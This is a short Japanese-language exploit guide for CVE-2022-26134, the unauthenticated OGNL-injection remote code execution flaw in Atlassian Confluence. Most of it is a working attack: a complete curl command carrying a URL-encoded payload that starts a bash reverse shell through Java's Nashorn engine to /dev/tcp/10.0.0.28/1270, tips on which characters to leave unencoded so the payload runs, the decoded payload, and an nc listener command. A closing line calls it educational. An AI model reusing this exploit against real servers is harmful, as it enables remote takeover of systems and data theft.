
AtlassianのQuestions for ConfluenceアプリにおけるCVE-2022-26134の活発な悪用
CVE-2022-26134 は、Atlassian Confluence に影響を与える深刻な**リモートコード実行(RCE)**脆弱性です。この脆弱性により、認証されていない攻撃者が脆弱なエンドポイントに OGNL 式を注入することで、任意のコードを実行できる可能性があります。
次の CURL コマンドは、Java の Nashorn エンジンを利用してリバースシェルを実行する、この脆弱性の実際の悪用を示しています:
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
これらの変更を行う際には、URL エンコーディングも考慮する必要があります。 プルーフ・オブ・コンセプトのペイロード文字列は完全には URL エンコードされていません。一部の文字(特に「.」「-」「/」)はエンコードされていません。 常にそうとは限りませんが、このエクスプロイトの場合、これはペイロードの機能にとって重要であることがわかります。これらの文字のいずれかがエンコードされると、 サーバーは URL を異なる方法で解析し、ペイロードが実行されない可能性があります。つまり、ペイロードを変更した後、ペイロード全体に URL エンコーディングを適用することはできません。
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
nc -lvnp 1270
このドキュメントは教育目的のみを対象としています。システムへの不正な悪用は違法であり、重大な結果を招く可能性があります。セキュリティ評価を実施する前に、必ず適切な許可を取得してください。